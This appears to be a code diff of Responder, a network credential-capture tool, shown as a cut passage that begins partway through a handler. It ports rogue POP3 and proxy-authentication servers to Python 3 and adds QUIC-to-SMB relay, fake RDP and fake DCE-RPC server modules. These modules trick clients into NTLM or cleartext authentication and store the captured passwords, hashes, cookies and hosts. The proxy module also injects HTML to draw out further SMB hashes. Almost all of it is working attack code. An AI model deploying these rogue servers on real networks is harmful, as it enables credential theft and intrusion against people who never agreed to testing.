+					auth_list = "+OK Supported mechanisms:\r\nPLAIN\r\nLOGIN\r\nCRAM-MD5\r\nNTLM\r\n.\r\n"
+					self.request.send(auth_list.encode('latin-1'))
+					data = self.request.recv(1024)
+				else:
+					self.send_err("Unsupported authentication method")
+					return
+			
+			# Handle APOP command
+			if data[0:4].upper() == b'APOP':
+				if self.handle_apop(data):
+					self.send_ok("Authentication successful")
+				else:
+					self.send_err("Authentication failed")
+				return
+			
+			# Handle traditional USER/PASS
+			if data[0:4].upper() == b'USER':
+				User = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
+				self.send_ok("Password required")
+				data = self.request.recv(1024)
+				
+				if data[0:4].upper() == b'PASS':
+					Pass = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
+					
+					SaveToDb({
+						'module': 'POP3',
+						'type': 'Cleartext',
+						'client': self.client_address[0],
+						'user': User,
+						'cleartext': Pass,
+						'fullhash': User + ":" + Pass,
+					})
+					
+					if settings.Config.Verbose:
+						print(color("[*] [POP3] Captured cleartext credentials from %s for user %s" % (
+							self.client_address[0].replace("::ffff:", ""), User), 2, 1))
+					
+					self.send_ok("Authentication successful")
+					return
+			
+			self.send_err("Unknown command")
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Exception: %s' % str(e)))
 			pass

servers/Proxy_Auth.py

@@ -14,15 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import SocketServer
-from HTTP import ParseHTTPHash
-from packets import *
 from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from servers.HTTP import ParseHTTPHash
+from packets import *
 
 def GrabUserAgent(data):
 	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
-        if UserAgent:
-           print text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2))
+	if UserAgent:
+		print(text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2)))
 
 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
@@ -30,8 +33,8 @@ def GrabCookie(data):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1:
-                        if settings.Config.Verbose:
-			        print text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2))
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2)))
 
 		return Cookie
 	return False
@@ -41,8 +44,8 @@ def GrabHost(data):
 
 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
-                if settings.Config.Verbose:
-		        print text("[Proxy-Auth] %s" % color("Host             : "+Host, 2))
+		if settings.Config.Verbose:
+			print(text("[Proxy-Auth] %s" % color("Host             : "+Host, 2)))
 
 		return Host
 	return False
@@ -52,36 +55,38 @@ def PacketSequence(data, client, Challenge):
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
-
-			Buffer = NTLM_Challenge(ServerChallenge=Challenge)
+				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
-			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
-			return str(Buffer_Ans)
-		if Packet_NTLM == "\x03":
+			Buffer_Ans =  WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-       	                ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
-                        GrabUserAgent(data)
-                        GrabCookie(data)
-                        GrabHost(data)
-   	                return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
+			GrabUserAgent(data)
+			GrabCookie(data)
+			GrabHost(data)
+			#Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
+			#Buffer.calculate()
+			#Return a TCP RST, so the client uses direct connection and avoids disruption.
+			return RST
 		else:
-               		return False
+               		return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...
 
 	elif Basic_Auth:
-                GrabUserAgent(data)
-                GrabCookie(data)
-                GrabHost(data)
-		ClearText_Auth = b64decode(''.join(Basic_Auth))
+		GrabUserAgent(data)
+		GrabCookie(data)
+		GrabHost(data)
+		ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1'))
 		SaveToDb({
 			'module': 'Proxy-Auth', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
 			})
 
 		return False
@@ -89,24 +94,51 @@ def PacketSequence(data, client, Challenge):
 		if settings.Config.Basic:
 			Response = WPAD_Basic_407_Ans()
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
+				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
 			Response = WPAD_Auth_407_Ans()
 
 		return str(Response)
 
-class Proxy_Auth(SocketServer.BaseRequestHandler):
+class Proxy_Auth(BaseRequestHandler):
 
-
-    def handle(self):
+	def handle(self):
 		try:
-                    Challenge = RandomChallenge()
-                    for x in range(2):
-                        data = self.request.recv(4096)
-                        self.request.send(PacketSequence(data, self.client_address[0], Challenge))
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 
 		except:
-                   	pass
+			pass
 
 

servers/QUIC.py

@@ -0,0 +1,168 @@
+import asyncio
+import logging
+import ssl
+import argparse
+import netifaces
+from utils import *
+from aioquic.asyncio import serve
+from aioquic.asyncio.protocol import QuicConnectionProtocol
+from aioquic.quic.configuration import QuicConfiguration
+from aioquic.quic.events import QuicEvent, StreamDataReceived, StreamReset, ConnectionTerminated
+
+BUFFER_SIZE = 11000
+
+def get_interface_ip(interface_name):
+    """Get the IP address of a network interface."""
+    try:
+        # Get address info for the specified interface
+        addresses = netifaces.ifaddresses(interface_name)
+        
+        # Get IPv4 address (AF_INET = IPv4)
+        if netifaces.AF_INET in addresses:
+            return addresses[netifaces.AF_INET][0]['addr']
+        
+        # If no IPv4 address, try IPv6 (AF_INET6 = IPv6)
+        if netifaces.AF_INET6 in addresses:
+            return addresses[netifaces.AF_INET6][0]['addr']
+        
+        logging.error(f"[!] No IP address found for interface {interface_name}")
+        return None
+    except ValueError:
+        logging.error(f"[!] Interface {interface_name} not found")
+        return None
+
+
+class QUIC(QuicConnectionProtocol):
+    def __init__(self, *args, target_address=None, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.tcp_connections = {}  # stream_id -> (reader, writer)
+        self.target_address = target_address or "localhost"
+        
+    def quic_event_received(self, event):
+        if isinstance(event, StreamDataReceived):
+            asyncio.create_task(self.handle_stream_data(event.stream_id, event.data))
+        elif isinstance(event, StreamReset) or isinstance(event, ConnectionTerminated):
+            # Only try to close connections if we have any
+            if self.tcp_connections:
+                asyncio.create_task(self.close_all_tcp_connections())
+                
+    async def handle_stream_data(self, stream_id, data):
+        if stream_id not in self.tcp_connections:
+            # Create a new TCP connection to the target interface:445
+            try:
+                reader, writer = await asyncio.open_connection(self.target_address, 445)
+                self.tcp_connections[stream_id] = (reader, writer)
+                
+                # Start task to read from TCP and write to QUIC
+                asyncio.create_task(self.tcp_to_quic(stream_id, reader))
+                
+                logging.info(f"[*] Connected to {self.target_address}:445\n[*] Starting relaying process...")
+                print(text("[QUIC] Forwarding QUIC connection to SMB server"))
+            except Exception as e:
+                logging.error(f"[!] Error connecting to {self.target_address}:445: {e}")
+                return
+        
+        # Forward data from QUIC to TCP
+        try:
+            _, writer = self.tcp_connections[stream_id]
+            writer.write(data)
+            await writer.drain()
+        except Exception as e:
+            logging.error(f"[!] Error writing to TCP: {e}")
+            await self.close_tcp_connection(stream_id)
+    
+    async def tcp_to_quic(self, stream_id, reader):
+        try:
+            while True:
+                data = await reader.read(BUFFER_SIZE)
+                if not data:
+                    break
+                
+                self._quic.send_stream_data(stream_id, data)
+                self.transmit()
+        except Exception as e:
+            logging.error(f"[!] Error reading from TCP: {e}")
+        finally:
+            await self.close_tcp_connection(stream_id)
+    
+    async def close_tcp_connection(self, stream_id):
+        if stream_id in self.tcp_connections:
+            _, writer = self.tcp_connections[stream_id]
+            writer.close()
+            await writer.wait_closed()
+            del self.tcp_connections[stream_id]
+    
+    async def close_all_tcp_connections(self):
+        try:
+            # Make a copy of the keys to avoid modification during iteration
+            stream_ids = list(self.tcp_connections.keys())
+            for stream_id in stream_ids:
+                try:
+                    await self.close_tcp_connection(stream_id)
+                except KeyError:
+                    # Silently ignore if the stream ID no longer exists
+                    pass
+        except Exception as e:
+            # Catch any other exceptions that might occur
+            logging.debug(f"[!] Error closing TCP connections: {e}")
+
+async def start_quic_server(listen_interface, cert_path, key_path):
+    # Configure QUIC
+    configuration = QuicConfiguration(
+        alpn_protocols=["smb"],
+        is_client=False,
+    )
+    
+    # Load certificate and private key
+    try:
+        configuration.load_cert_chain(cert_path, key_path)
+    except Exception as e:
+        logging.error(f"[!] Could not load {cert_path} and {key_path}: {e}")
+        return
+    
+    # Resolve interfaces to IP addresses
+    listen_ip = listen_interface
+    if not is_ip_address(listen_interface):
+        listen_ip = get_interface_ip(listen_interface)
+        if not listen_ip:
+            logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
+            return
+    
+    target_ip = listen_interface
+    if not is_ip_address(listen_interface):
+        target_ip = get_interface_ip(listen_interface)
+        if not target_ip:
+            logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
+            return
+    
+    # Start QUIC server with correct protocol factory
+    server = await serve(
+        host=listen_ip,
+        port=443,
+        configuration=configuration,
+        create_protocol=lambda *args, **kwargs: QUIC(
+            *args,
+            target_address=target_ip,
+            **kwargs
+        )
+    )
+    
+    logging.info(f"[*] Started listening on {listen_ip}:443 (UDP)")
+    logging.info(f"[*] Forwarding connections to {target_ip}:445 (TCP)")
+    
+    # Keep the server running forever
+    await asyncio.Future()
+
+
+def is_ip_address(address):
+    """Check if a string is a valid IP address."""
+    import socket
+    try:
+        socket.inet_pton(socket.AF_INET, address)
+        return True
+    except socket.error:
+        try:
+            socket.inet_pton(socket.AF_INET6, address)
+            return True
+        except socket.error:
+            return False

servers/RDP.py

@@ -0,0 +1,146 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer
+
+cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+
+def ParseNTLMHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+
+def FindNTLMNegoStep(data):
+	NTLMStart  = data.find(b'NTLMSSP')
+	NTLMString = data[NTLMStart:]
+	NTLMStep = NTLMString[8:12]
+	if NTLMStep == b'\x01\x00\x00\x00':
+		return NTLMStep
+	if NTLMStep == b'\x03\x00\x00\x00':
+		return NTLMStep
+	else:
+		return False
+
+class RDP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(30)
+			Challenge = RandomChallenge()
+
+			cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert, key)
+
+			if data[11:12] == b'\x01':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				SSLsock = context.wrap_socket(self.request, server_side=True)
+				SSLsock.settimeout(30)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			##Sometimes a client sends a routing cookie; we don't want to miss that let's look at it the other way around..
+			if data[len(data)-4:] == b'\x03\x00\x00\x00':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				data = self.request.recv(8092)
+				SSLsock = context.wrap_socket(self.request, server_side=True)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			else:
+				return False
+		except:
+			pass

servers/RPC.py

@@ -0,0 +1,401 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
+
+# Transfer syntaxes
+NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" # NDR v2
+Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" # v1
+MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
+
+# Common RPC interface UUIDs (original ones)
+DSRUAPI  = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2"  # v4
+LSARPC   = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" # v0
+NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" # v1
+WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" # v1
+
+# Additional RPC interfaces for better coverage
+SAMR     = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xac" # v1 - Security Account Manager
+SRVSVC   = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" # v3 - Server Service
+WKSSVC   = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a" # v1 - Workstation Service
+WINREG   = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03" # v1 - Windows Registry
+SVCCTL   = "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03" # v2 - Service Control Manager
+ATSVC    = "\x82\x06\xf7\x1f\x51\x0a\xe8\x30\x07\x6d\x74\x0b\xe8\xce\xe9\x8b" # v1 - Task Scheduler
+DNSSERVER= "\xa4\xc2\xab\x50\x4d\x57\xb3\x40\x9d\x66\xee\x4f\xd5\xfb\xa0\x76" # v5 - DNS Server
+
+# Interface names for logging
+INTERFACE_NAMES = {
+	DSRUAPI: "DRSUAPI",
+	LSARPC: "LSARPC",
+	NETLOGON: "NETLOGON",
+	WINSPOOL: "WINSPOOL",
+	SAMR: "SAMR",
+	SRVSVC: "SRVSVC",
+	WKSSVC: "WKSSVC",
+	WINREG: "WINREG",
+	SVCCTL: "SVCCTL",
+	ATSVC: "ATSVC",
+	DNSSERVER: "DNSSERVER"
+}
+
+def FindNTLMOpcode(data):
+	"""Find NTLMSSP message type in data"""
+	SSPIStart = data.find(b'NTLMSSP')
+	if SSPIStart == -1:
+		return False
+	SSPIString = data[SSPIStart:]
+	if len(SSPIString) < 12:
+		return False
+	return SSPIString[8:12]
+
+def ParseRPCHash(data, client, Challenge):
+	"""Parse NTLMSSP v1/v2 hashes from RPC data"""
+	SSPIStart = data.find(b'NTLMSSP')
+	if SSPIStart == -1:
+		return
+	
+	SSPIString = data[SSPIStart:]
+	if len(SSPIString) < 64:
+		return
+	
+	try:
+		LMhashLen    = struct.unpack('<H', data[SSPIStart+14:SSPIStart+16])[0]
+		LMhashOffset = struct.unpack('<H', data[SSPIStart+16:SSPIStart+18])[0]
+		LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+		LMHash       = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+		
+		NthashLen    = struct.unpack('<H', data[SSPIStart+20:SSPIStart+22])[0]
+		NthashOffset = struct.unpack('<H', data[SSPIStart+24:SSPIStart+26])[0]
+		
+		# NTLMv1
+		if NthashLen == 24:
+			SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+			SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+			DomainLen    = struct.unpack('<H', SSPIString[30:32])[0]
+			DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
+			Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+			UserLen      = struct.unpack('<H', SSPIString[38:40])[0]
+			UserOffset   = struct.unpack('<H', SSPIString[40:42])[0]
+			Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+			
+			# Try to get hostname
+			HostnameLen    = struct.unpack('<H', SSPIString[46:48])[0]
+			HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
+			if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
+				Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
+			else:
+				Hostname = ''
+			
+			WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge, 'hex').decode('latin-1'))
+			
+			SaveToDb({
+				'module': 'DCE-RPC',
+				'type': 'NTLMv1-SSP',
+				'client': client,
+				'hostname': Hostname,
+				'user': Domain+'\\'+Username,
+				'hash': SMBHash,
+				'fullhash': WriteHash,
+			})
+		
+		# NTLMv2
+		elif NthashLen > 60:
+			SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+			SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+			DomainLen    = struct.unpack('<H', SSPIString[30:32])[0]
+			DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
+			Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+			UserLen      = struct.unpack('<H', SSPIString[38:40])[0]
+			UserOffset   = struct.unpack('<H', SSPIString[40:42])[0]
+			Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+			
+			# Try to get hostname
+			HostnameLen    = struct.unpack('<H', SSPIString[46:48])[0]
+			HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
+			if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
+				Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
+			else:
+				Hostname = ''
+			
+			WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge, 'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+			
+			SaveToDb({
+				'module': 'DCE-RPC',
+				'type': 'NTLMv2-SSP',
+				'client': client,
+				'hostname': Hostname,
+				'user': Domain+'\\'+Username,
+				'hash': SMBHash,
+				'fullhash': WriteHash,
+			})
+	except Exception as e:
+		if settings.Config.Verbose:
+			print(text('[DCE-RPC] Error parsing hash: %s' % str(e)))
+
+def FindInterfaceUUID(data):
+	"""Find which RPC interface UUID is being requested"""
+	# Check for each known interface UUID in the data
+	for uuid, name in INTERFACE_NAMES.items():
+		if NetworkSendBufferPython2or3(uuid) in data:
+			return uuid, name
+	return None, None
+
+class RPCMap(BaseRequestHandler):
+	"""RPCMap handler - Port 135 Endpoint Mapper"""
+	
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			if not data:
+				return
+			
+			self.request.settimeout(5)
+			Challenge = RandomChallenge()
+			
+			# Handle BIND request
+			if data[0:3] == b"\x05\x00\x0b":  # Bind Request
+				# Identify which interface first
+				uuid, interface_name = FindInterfaceUUID(data)
+				if not interface_name:
+					interface_name = "unknown interface"
+				
+				# Check for NTLMSSP NEGOTIATE in BIND
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					# Send NTLMSSP CHALLENGE
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					
+					# Receive NTLMSSP AUTH
+					data = self.request.recv(2048)
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+						self.request.close()
+						return
+				
+				# Standard BIND processing
+				if NetworkSendBufferPython2or3(Map) in data:
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				elif NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data:
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				else:
+					# Try to identify which interface
+					if uuid:
+						RPC = RPCMapBindAckAcceptedAns(CTX1UID=uuid, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+						if settings.Config.Verbose:
+							print(text('[DCE-RPC] BIND request for %s from %s' % (interface_name, self.client_address[0].replace("::ffff:", ""))))
+					else:
+						# Default to NDR
+						RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				
+				# Try to receive more data (AUTH3 or REQUEST)
+				try:
+					data = self.request.recv(2048)
+					if data:
+						# Check for AUTH3 (packet type 0x10)
+						if len(data) > 2 and data[2:3] == b"\x10":
+							if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+								ParseRPCHash(data, self.client_address[0], Challenge)
+								print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+						# Check for NTLM in any subsequent packet
+						elif FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+							ParseRPCHash(data, self.client_address[0], Challenge)
+							print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+				except:
+					pass
+			
+			# Handle mapper requests (after BIND)
+			elif data[0:3] == b"\x05\x00\x00":  # Mapper request
+				uuid, name = FindInterfaceUUID(data)
+				
+				if uuid == DSRUAPI:
+					x = RPCMapBindMapperAns()
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DRSUAPI auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == LSARPC:
+					x = RPCMapBindMapperAns(Tower1UID=LSARPC, Tower1Version="\x00\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
